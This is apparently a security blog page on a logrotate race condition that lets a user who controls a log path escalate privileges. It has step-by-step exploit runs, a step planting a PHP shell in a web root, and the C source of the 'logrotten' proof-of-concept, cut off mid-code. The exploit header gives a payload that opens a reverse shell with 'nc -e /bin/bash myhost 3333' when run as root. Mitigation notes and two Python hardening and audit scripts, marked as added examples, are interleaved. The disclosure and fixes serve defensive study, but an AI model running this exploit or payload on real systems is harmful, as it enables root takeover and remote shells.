}</code></pre> <p>www-data executes the exploit and waits until logrotate is started by cron:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">www-data@localhost$ ./logrotten /var/www/project/logdir/file.log
Waiting for rotating /var/www/project/logdir/file.log...
Renamed /var/www/project/logdir with /var/www/project/logdir2 and created symlink to /etc/bash_completion.d
Done!</pre></div></pre> <p>The new file is created in /etc/bash_completion.d with owner root and with the ACLs copied. The mask (rw-) limits the effective rights, but www-data still has write access to a file that interactive bash shells with bash-completion enabled will source:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">-rw-rw-r--+ 1 root root 0 Apr 30 17:16 /etc/bash_completion.d/file.log</pre></div></pre> <p>Access control list of /etc/bash_completion.d/file.log:</p> <pre> <code># file: etc/bash_completion.d/file.log
# owner: root
# group: root
user::rw-
user:root:rwx                   #effective:rw-
user:www-data:rwx               #effective:rw-
group::r-x                      #effective:r--
mask::rw-
other::r--</code></pre> <h3>3) Parent directory is secure and owned by root, but another directory above the parent is writable by a user. The logfile is owned by root.</h3> <p>This example shows that it is not enough to ensure that the logdir and its parent are owned by root. 
As long as one directory of the complete path can be modified by a user, logrotate can be exploited: the attacker renames the secure subtree aside and replaces it with one he owns, and logrotate, which only knows the configured path, rotates the replacement.</p> <p>Root owns /var/www/project/html:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">drwxr-xr-x 3 root root 4096 Apr 30 17:26 /var/www/project/html/</pre></div></pre> <p>Root owns /var/www/project/html/logdir/:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">drwxr-xr-x 2 root root 4096 Apr 30 17:28 /var/www/project/html/logdir/</pre></div></pre> <p>Only root can write the logfile:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">-rw-r--r-- 1 root root 0 Apr 30 17:28 /var/www/project/html/logdir/file.log</pre></div></pre> <p>User www-data can manipulate the path above the log directory:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">drwxr-xr-x 3 www-data root 4096 Apr 30 17:26 /var/www/project</pre></div></pre> <p>Logrotate configuration having the “create” directive:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">/var/www/project/html/logdir/file.log {
    daily
    rotate 12
    missingok
    notifempty
    size 1k
    create
}</pre></div></pre> <p>www-data is allowed to rename the directory /var/www/project/html:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">www-data@localhost$ mv /var/www/project/html/ /var/www/project/html2</pre></div></pre> <p>www-data can create a new logdir, and it will be writable by www-data:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">www-data@localhost$ mkdir -p /var/www/project/html/logdir</pre></div></pre> <p>www-data can write into the new logfile:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">www-data@localhost$ echo "hello world" &gt; /var/www/project/html/logdir/file.log</pre></div></pre> <p>Permissions of /var/www/project/html/logdir/file.log:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">-rw-r--r-- 1 www-data www-data 0 Apr 30 17:31 /var/www/project/html/logdir/file.log</pre></div></pre> <p>User www-data executes the exploit and waits until logrotate is started by cron:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">www-data@localhost$ ./logrotten /var/www/project/html/logdir/file.log
Waiting for rotating /var/www/project/html/logdir/file.log...
Renamed /var/www/project/html/logdir with /var/www/project/html/logdir2 and created symlink to /etc/bash_completion.d
Done!</pre></div></pre> <p>The new file was created in /etc/bash_completion.d with owner www-data:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">-rw-r--r-- 1 www-data www-data 0 Apr 30 17:35 /etc/bash_completion.d/file.log</pre></div></pre> <h3>4) Logrotate runs as a low-privileged user because the “su” directive is set. The path to the log directory is controlled by members of a group.</h3> <p>Using the “su”-directive is not safe per se. 
It prevents attackers from getting root privileges, but it is still possible to gain the privileges of another user.</p> <p>The directories in /var/www are owned by www-data. Only logdirs is writable by members of the group “loggrp”:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">drwxr-xr-x 2 www-data www-data 4096 May 1 05:21 /var/www/html
drwxrwxr-x 3 www-data loggrp 4096 May 1 05:24 /var/www/logdirs</pre></div></pre> <p>The users www-data and myserv are members of the group loggrp:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">loggrp:x:1001:www-data,myserv</pre></div></pre> <p>Logrotate is configured with the “su”-directive. It will rotate logs with the privileges of www-data instead of root. The target /var/www/logdirs/example.com/* makes sure that all files inside the log directory will be rotated, so a member of loggrp can simply drop a file with a name of his choosing into it:</p> <pre> <code>/var/www/logdirs/example.com/* {
    daily
    rotate 12
    missingok
    notifempty
    size 1k
    create www-data loggrp
    su www-data loggrp
}</code></pre> <p>User “myserv” executes the exploit with the target directory “/var/www/html”:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">myserv@localhost$ ./logrotten -t /var/www/html /var/www/logdirs/example.com/shell.php
Waiting for rotating /var/www/logdirs/example.com/shell.php...
Renamed /var/www/logdirs/example.com with /var/www/logdirs/example.com2 and created symlink to /var/www/html
Done!</pre></div></pre> <p>The new file in the web root is owned by www-data:loggrp and group-writable, so user “myserv” is now able to write any PHP shell into the newly created file and have the web server execute it as www-data:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">-rw-rw-r-- 1 www-data loggrp 0 May 1 05:47 /var/www/html/shell.php</pre></div></pre> <h2>Mitigation</h2> <p>This vulnerability occurs if log files are rotated in insecure directories. 
Even though the “su”-directive of logrotate can prevent an attacker from becoming root, it still leaves the opportunity open to escalate to another system user (as shown in example 4).</p> <p>One way to mitigate the problem is to confine logrotate with AppArmor or SELinux, so that it cannot create files outside the configured log directories even when the path has been redirected.</p> <h2>Fix</h2> <p>Vulnerable setups are easily fixed by making sure that every directory in the path to the log directory can only be manipulated by root or by the owner of the log directory. However, a vulnerable setup is not always obvious. Therefore logrotate should check the complete path to the log directory: every component, from / down to the log directory, must be owned by a trusted user, must not be writable by anyone else (through mode bits or ACLs), and must not be a symlink. If one element of the path is not secure, logrotate has to abort with an error. Algorithms for checking a directory path can be found on the following pages:</p> <ul><li> <p><a href="http://research.cs.wisc.edu/mist/safefile/safeopen_ares2008.pdf">http://research.cs.wisc.edu/mist/safefile/safeopen_ares2008.pdf</a></p> </li> <li> <p><a href="https://wiki.sei.cmu.edu/confluence/display/c/FIO15-C.+Ensure+that+file+operations+are+performed+in+a+secure+directory">https://wiki.sei.cmu.edu/confluence/display/c/FIO15-C.+Ensure+that+file+operations+are+performed+in+a+secure+directory</a></p> </li> </ul><p>Deploying such a fix might have a huge impact. If it were deployed at large scale, it could break existing installations, because it prevents logrotate from rotating in insecure setups.</p> <h2>Conclusion</h2> <p>Logrotate is widely used for rotating logfiles. As the examples above have shown, insecure configurations are not always obvious. 
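</p> <p>The check described in the Fix section, as an added example that is not part of this post or of logrotate: a Python audit script that walks every directory from / down to the log directory and reports anything that lets a uid other than root (or the user a "create" or "su" line runs as) rename, replace or redirect a component, which is what examples 1 to 4 all rely on. It also decodes the POSIX ACL of each component, which Linux exposes as the system.posix_acl_access xattr, so the setup of example 2, which a plain ls -l only hints at with the "+" after the mode bits, is caught as well. The ACL bytes and the directory tree used for the demonstration are constructed, and uid 33 for www-data is an assumption.</p>

```python
import os
import stat
import sys
import tempfile

# Linux keeps a POSIX ACL in the "system.posix_acl_access" xattr
# (include/uapi/linux/posix_acl_xattr.h): a 32-bit version (2) followed by
# entries of (16-bit tag, 16-bit perm, 32-bit id), all little-endian.
ACL_XATTR = "system.posix_acl_access"
ACL_USER_OBJ, ACL_USER, ACL_GROUP_OBJ, ACL_GROUP, ACL_MASK, ACL_OTHER = 1, 2, 4, 8, 0x10, 0x20
ACL_WRITE, ACL_UNDEFINED_ID = 0x2, 0xFFFFFFFF


def _le(b):
    return int.from_bytes(b, "little")


def parse_posix_acl(blob):
    """Decode the raw xattr value into (tag, perm, id) tuples."""
    if _le(blob[0:4]) != 2:
        raise ValueError("unexpected ACL xattr version")
    return [(_le(blob[o:o + 2]), _le(blob[o + 2:o + 4]), _le(blob[o + 4:o + 8]))
            for o in range(4, len(blob), 8)]


def acl_write_grants(entries, allowed_uids):
    """Named user/group entries that still grant write once the mask is applied
    (getfacl's '#effective' column); owner/group-object bits are mode bits."""
    mask = ACL_WRITE
    for tag, perm, _ in entries:
        if tag == ACL_MASK:
            mask = perm
    grants = []
    for tag, perm, ident in entries:
        if not (perm & mask & ACL_WRITE):
            continue
        if tag == ACL_USER and ident not in allowed_uids:
            grants.append("user:%d" % ident)
        elif tag == ACL_GROUP:
            grants.append("group:%d" % ident)
    return grants


def read_acl(path):
    try:
        return parse_posix_acl(os.getxattr(path, ACL_XATTR, follow_symlinks=False))
    except OSError:  # ENODATA: no extended ACL; ENOTSUP: filesystem without xattrs
        return []


def insecure_components(logfile, allowed_uids=(0,)):
    """Walk from / down to the directory holding logfile; return (path, reason) for
    every component a uid outside allowed_uids could rename, replace or redirect.
    An empty list means rotating in this directory is safe."""
    prefixes = [os.sep]
    for comp in os.path.dirname(os.path.abspath(logfile)).split(os.sep)[1:]:
        if comp:
            prefixes.append(os.path.join(prefixes[-1], comp))
    findings = []
    for d in prefixes:
        st = os.lstat(d)
        if stat.S_ISLNK(st.st_mode):
            findings.append((d, "symlink in path"))
            continue
        if st.st_uid not in allowed_uids:
            findings.append((d, "owned by uid %d" % st.st_uid))
        if st.st_mode & stat.S_IWGRP:
            findings.append((d, "group-writable"))
        if st.st_mode & stat.S_IWOTH:  # sticky bit is no help: the attacker renames an entry he owns
            findings.append((d, "world-writable"))
        for who in acl_write_grants(read_acl(d), allowed_uids):
            findings.append((d, "ACL grants write to " + who))
    return findings


def example2_acl(mask_perm):
    """Constructed ACL matching getfacl's output for /var/www/project in example 2
    (uid 33 for www-data is an assumption), with the mask entry set to mask_perm."""
    out = (2).to_bytes(4, "little")
    for tag, perm, ident in ((ACL_USER_OBJ, 7, ACL_UNDEFINED_ID), (ACL_USER, 7, 33),
                             (ACL_GROUP_OBJ, 5, ACL_UNDEFINED_ID),
                             (ACL_MASK, mask_perm, ACL_UNDEFINED_ID), (ACL_OTHER, 5, ACL_UNDEFINED_ID)):
        out += tag.to_bytes(2, "little") + perm.to_bytes(2, "little") + ident.to_bytes(4, "little")
    return out


def demo_findings():
    """Constructed fixture TMP/project (group-writable, like example 4's logdirs) /
    logdir (0755) / file.log; returns the findings for those two directories only."""
    base = tempfile.mkdtemp(prefix="logpath-demo-")
    project = os.path.join(base, "project")
    logdir = os.path.join(project, "logdir")
    os.makedirs(logdir)
    os.chmod(project, 0o775)
    os.chmod(logdir, 0o755)
    logfile = os.path.join(logdir, "file.log")
    open(logfile, "w").close()
    findings = insecure_components(logfile, allowed_uids=(0, os.getuid()))
    return {os.path.relpath(d, base): [r for p, r in findings if p == d] for d in (project, logdir)}


if __name__ == "__main__":  # usage: check_logpath.py /var/www/project/logdir/file.log ...
    for target in sys.argv[1:]:
        for path, reason in insecure_components(target):
            print("%s: %s (%s)" % (target, path, reason))
```

<p>Run it as root against every path listed in /etc/logrotate.d before trusting the rotation; for a "su user group" stanza pass that user's uid in allowed_uids, since that user is trusted by definition there. The walk uses lstat and also flags group-writable directories, because example 4 shows that a group member can escalate to the "su" user even when root is out of reach; a sticky, world-writable /tmp is reported too, since the attacker renames an entry he owns and the sticky bit does not stop that.</p> <p>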
Even though a fix could prevent privilege escalations, it might also stop logrotate from working in insecure setups.</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">May 01 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> </div> </div> Wed, 01 May 2019 11:04:35 +0000 Hoti 276 at https://tech.feedyourhead.at Abusing a race condition in logrotate to elevate privileges https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges <span class="field field--name-title field--type-string field--label-hidden">Abusing a race condition in logrotate 
to elevate privileges</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Together with a friend I took part in the Capture The Flag at the 35C3. One of the challenges was this one:</p> <blockquote> <p>Logrotate is designed to ease administration of systems that generate large numbers of log files. It allows automatic rotation, compression, removal, and mailing of log files. Each log file may be handled daily, weekly, monthly, or when it grows too large. It also gives you a root shell.</p> </blockquote> <p>After searching on Google I found out about a race condition in logrotate. In many <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=400198">bug reports</a> it was stated that a race condition exists <s>if logrotate gets executed with the "create" option</s>. A very detailed and brilliant analysis of the problem can be found on the blog of the <a href="https://blog.nsogroup.com/logrotate-zajebiste-500-points/">nsogroup</a>. Their exploit was very specific to the CTF challenge and needs a suid binary that executes run-parts (cron). It worked for the CTF and I guess they earned their points. I was too slow and did not solve the challenge, but I tried to finish it at home. My approach was to use inotify on /tmp/log/pwnme.log to trigger the race. It seems that the logrotate bug can be exploited in live environments.</p> <h3>Requirements</h3> <p>In order to exploit this vulnerability for privilege escalation the following requirements must be met:</p> <ul> <li>logrotate has to run as user root</li> <li>an unprivileged user has to be in control of the logdir path (any directory component of the path is enough)</li> <li>the config file has to include a directive that creates new files in the log directory (such as "create" or "compress")</li> </ul> <p>An attacker could elevate his privileges by writing reverse shells into directories like "/etc/bash_completion.d/". 
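</p> <p>Before the exploit itself, the defensive counterpart, as an added example that is neither logrotate's code nor part of the original post: the race exists because the log directory is addressed by path twice, once for the rename and once for the create, and the attacker changes what that path resolves to in between. Opening the directory once with O_DIRECTORY|O_NOFOLLOW and doing both steps relative to that descriptor (renameat/openat, available in Python through the dir_fd arguments) closes the window, because the descriptor refers to the directory inode and not to its name. simulate() builds a temporary tree and performs the attacker's rename-plus-symlink deterministically inside the race window, so the difference shows without winning any timing; the bash_completion.d directory in it is a constructed stand-in for /etc/bash_completion.d.</p>

```python
import os
import tempfile

# Open the log directory itself: refuse a symlink in its place and get an fd
# that refers to the directory inode, whatever it is renamed to later.
DIR_FLAGS = os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW | os.O_CLOEXEC
# Create the new log: never follow a planted symlink, never reuse an existing name.
CREATE_FLAGS = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW | os.O_CLOEXEC


def rotate_pinned(dirfd, name, mode=0o644, race_window=None):
    """logrotate's rename-then-create step, done relative to dirfd.

    race_window is a hook run between the two steps; it stands in for an
    attacker who wins the race right after the rename, as logrotten does.
    """
    os.rename(name, name + ".1", src_dir_fd=dirfd, dst_dir_fd=dirfd)  # renameat(2)
    if race_window:
        race_window()
    fd = os.open(name, CREATE_FLAGS, mode, dir_fd=dirfd)              # openat(2)
    os.fchmod(fd, mode)  # set metadata through the fd, not through the path
    os.close(fd)


def rotate_by_path(logfile, mode=0o644, race_window=None):
    """The path-based sequence the race abuses: rename, then open(path, O_CREAT).
    Kept only for comparison; the directory component is resolved twice."""
    os.rename(logfile, logfile + ".1")
    if race_window:
        race_window()
    os.close(os.open(logfile, os.O_WRONLY | os.O_CREAT, mode))


def simulate(hardened):
    """Constructed scenario: the attacker owns TMP/log and, inside the race
    window, swaps it for a symlink to TMP/bash_completion.d (stand-in for
    /etc/bash_completion.d). Returns (landed_in_target, landed_in_real_logdir)."""
    base = tempfile.mkdtemp(prefix="logrotten-demo-")
    logdir = os.path.join(base, "log")
    target = os.path.join(base, "bash_completion.d")
    os.mkdir(logdir)
    os.mkdir(target)
    open(os.path.join(logdir, "pwnme.log"), "w").close()

    def attacker_swap():
        os.rename(logdir, logdir + "2")
        os.symlink(target, logdir)

    if hardened:
        dirfd = os.open(logdir, DIR_FLAGS)  # pinned before any rotation step
        try:
            rotate_pinned(dirfd, "pwnme.log", race_window=attacker_swap)
        finally:
            os.close(dirfd)
    else:
        rotate_by_path(os.path.join(logdir, "pwnme.log"), race_window=attacker_swap)

    return (os.path.exists(os.path.join(target, "pwnme.log")),
            os.path.exists(os.path.join(logdir + "2", "pwnme.log")))


if __name__ == "__main__":
    print("by path:", simulate(hardened=False))  # (True, False): written into the target dir
    print("pinned :", simulate(hardened=True))   # (False, True): stayed in the real log dir
```

<p>What the pinned descriptor does and does not buy: an attacker who owns the log directory can still make the rotation fail (a symlink planted under the new name trips O_EXCL|O_NOFOLLOW), but he can no longer steer the created file into a directory of his choosing, which is the whole privilege escalation. Ownership and mode of the new file must then also be set through the descriptor (fchmod/fchown), never through the path, or the same race returns one syscall later.</p> <p>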
This is what the logrotate config looks like:</p> <pre> <code>/tmp/log/pwnme.log {
    daily
    rotate 12
    missingok
    notifempty
    size 1k
    create
}</code></pre> <p>My unprivileged user is in full control of /tmp/log/:</p> <pre> <code>osboxes@osboxes:~$ ls -l /tmp/log
total 2940
-rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log
-rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.0
-rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.1
-rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.10
-rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.11
-rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.12
-rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.13
-rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.2
-rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.3
-rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.4
-rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.5
-rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.6
-rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.7
-rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.8
-rw-r--r-- 1 osboxes osboxes 200000 Jan 14 15:34 pwnme.log.9
osboxes@osboxes:~$ ls -ld /tmp/log
drwxr-xr-x 2 osboxes osboxes 4096 Jan 14 15:34 /tmp/log</code></pre> <h3>Exploit</h3> <p>The vulnerability is triggered by replacing /tmp/log with a symlink to /etc/bash_completion.d after logrotate has renamed /tmp/log/pwnme.log but before it creates the new pwnme.log; the inotify watch on the logfile signals the moment of the rename. I wrote the following <a href="https://github.com/whotwagner/logrotten">exploit</a>:</p> <pre> <div class="geshifilter"><pre class="c geshifilter-c" style="font-family:monospace;">/*
 * logrotate poc exploit
 *
 * [ Brief description ]
 * - logrotate is prone to a race condition after renaming the logfile.
 * - If logrotate is executed as root and the user is in control of the
 *   logfile path, it is possible to abuse a race-condition to write files
 *   in ANY directories.
 * - An attacker could elevate his privileges by writing reverse-shells into
 *   directories like "/etc/bash_completion.d/".
 * - This vulnerability was found during a challenge at the 35c3 CTF
 *   ( https://ctftime.org/event/718 )
 * - A detailed description and a PoC of this challenge was written by the
 *   nsogroup ( https://blog.nsogroup.com/logrotate-zajebiste-500-points/ )
 *
 * [ Precondition for privilege escalation ]
 * - Logrotate needs to be executed as root
 * - The logpath needs to be in control of the attacker
 * - "create" option is set in the logrotate configuration.
 *   This exploit might not work without
 *
 * [ Tested version ]
 * - Debian GNU/Linux 9.5 (stretch)
 * - Amazon Linux 2 AMI (HVM)
 * - Ubuntu 18.04.1
 * - logrotate 3.8.6
 * - logrotate 3.11.0
 * - logrotate 3.15.0
 *
 * [ Compile ]
 * - gcc -o logrotten logrotten.c
 *
 * [ Prepare payload ]
 * - echo "if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash myhost 3333 &amp;); fi" &gt; payloadfile
 *
 * [ Run exploit ]
 * - nice -n -20 ./logrotten /tmp/log/pwnme.log payloadfile
 *
 * [ Known Problems ]
 * - It's hard to win the race inside a docker container
 *
 * [ Mitigation ]
 * - make sure that logpath is owned by root
 * - or use option "nocreate"
 *
 * [ Author ]
 * - Wolfgang Hotwagner
 *
 * [ Contact ]
 * - https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
 * - https://github.com/whotwagner/logrotten
 */

#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;errno.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/inotify.h&gt;
#include &lt;unistd.h&gt;
#include &lt;string.h&gt;
#include &lt;alloca.h&gt;
#include &lt;sys/stat.h&gt;

#define EVENT_SIZE ( sizeof (struct inotify_event) )
#define EVENT_BUF_LEN ( 1024 * ( EVENT_SIZE + 16 ) )

/* use TARGETDIR without "/" at the end */
#define TARGETDIR "/etc/bash_completion.d"

#define DEBUG 1

int main(int argc, char* argv[] )
{
    int length, i = 0;
    int j = 0;
    int index = 0;
    int fd;
    int wd;
    char buffer[EVENT_BUF_LEN];
    const char *payloadfile;
    const char *logfile;
    char *logpath;
    char *logpath2;
    char *targetpath;
    char *targetdir;
    char ch;
    const char *p;
    FILE *source, *target;

    if(argc &lt; 3)
    {
        fprintf(stderr,"usage: %s &lt;logfile&gt; &lt;payloadfile&gt; [targetdir]\n",argv[0]);
        exit(1);
    }

    logfile = argv[1];
    payloadfile = argv[2];

    /* find the last '/' to split the directory from the file name */
    for(j=strlen(logfile); (logfile[j] != '/') &amp;&amp; (j != 0); j--);

    index = j+1;

    p = <span
style="color: #339933;">&amp;</span>logfile<span style="color: #009900;">&#91;</span>index<span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> &nbsp; logpath <span style="color: #339933;">=</span> alloca<span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>logfile<span style="color: #009900;">&#41;</span><span style="color: #339933;">*</span><span style="color: #993333;">sizeof</span><span style="color: #009900;">&#40;</span><span style="color: #993333;">char</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> logpath2 <span style="color: #339933;">=</span> alloca<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>logfile<span style="color: #009900;">&#41;</span><span style="color: #339933;">+</span><span style="color: #0000dd;">2</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">*</span><span style="color: #993333;">sizeof</span><span style="color: #009900;">&#40;</span><span style="color: #993333;">char</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span>argc <span style="color: #339933;">&gt;</span> <span style="color: #0000dd;">3</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> targetdir <span style="color: #339933;">=</span> argv<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">3</span><span style="color: #009900;">&#93;</span><span style="color: 
#339933;">;</span> targetpath <span style="color: #339933;">=</span> alloca<span style="color: #009900;">&#40;</span> <span style="color: #009900;">&#40;</span> <span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>argv<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">3</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">+</span> <span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>p<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">+</span><span style="color: #0000dd;">3</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">*</span><span style="color: #993333;">sizeof</span><span style="color: #009900;">&#40;</span><span style="color: #993333;">char</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcat.html"><span style="color: #000066;">strcat</span></a><span style="color: #009900;">&#40;</span>targetpath<span style="color: #339933;">,</span>argv<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">3</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #b1b100;">else</span> <span style="color: #009900;">&#123;</span> targetdir<span style="color: #339933;">=</span> TARGETDIR<span style="color: #339933;">;</span> targetpath <span style="color: 
#339933;">=</span> alloca<span style="color: #009900;">&#40;</span> <span style="color: #009900;">&#40;</span> <span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>TARGETDIR<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">+</span> <span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>p<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">+</span><span style="color: #0000dd;">3</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">*</span><span style="color: #993333;">sizeof</span><span style="color: #009900;">&#40;</span><span style="color: #993333;">char</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> targetpath<span style="color: #009900;">&#91;</span><span style="color: #0000dd;">0</span><span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> <span style="color: #ff0000;">'<span style="color: #006699; font-weight: bold;">\0</span>'</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcat.html"><span style="color: #000066;">strcat</span></a><span style="color: #009900;">&#40;</span>targetpath<span style="color: #339933;">,</span>TARGETDIR<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcat.html"><span style="color: #000066;">strcat</span></a><span style="color: #009900;">&#40;</span>targetpath<span 
style="color: #339933;">,</span><span style="color: #ff0000;">&quot;/&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcat.html"><span style="color: #000066;">strcat</span></a><span style="color: #009900;">&#40;</span>targetpath<span style="color: #339933;">,</span>p<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #b1b100;">for</span><span style="color: #009900;">&#40;</span>j <span style="color: #339933;">=</span> <span style="color: #0000dd;">0</span><span style="color: #339933;">;</span> j <span style="color: #339933;">&lt;</span> index<span style="color: #339933;">;</span> j<span style="color: #339933;">++</span><span style="color: #009900;">&#41;</span> logpath<span style="color: #009900;">&#91;</span>j<span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> logfile<span style="color: #009900;">&#91;</span>j<span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> logpath<span style="color: #009900;">&#91;</span>j<span style="color: #339933;">-</span><span style="color: #0000dd;">1</span><span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> <span style="color: #ff0000;">'<span style="color: #006699; font-weight: bold;">\0</span>'</span><span style="color: #339933;">;</span> &nbsp; <a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcpy.html"><span style="color: #000066;">strcpy</span></a><span style="color: #009900;">&#40;</span>logpath2<span style="color: #339933;">,</span>logpath<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> logpath2<span style="color: #009900;">&#91;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>logpath<span style="color: 
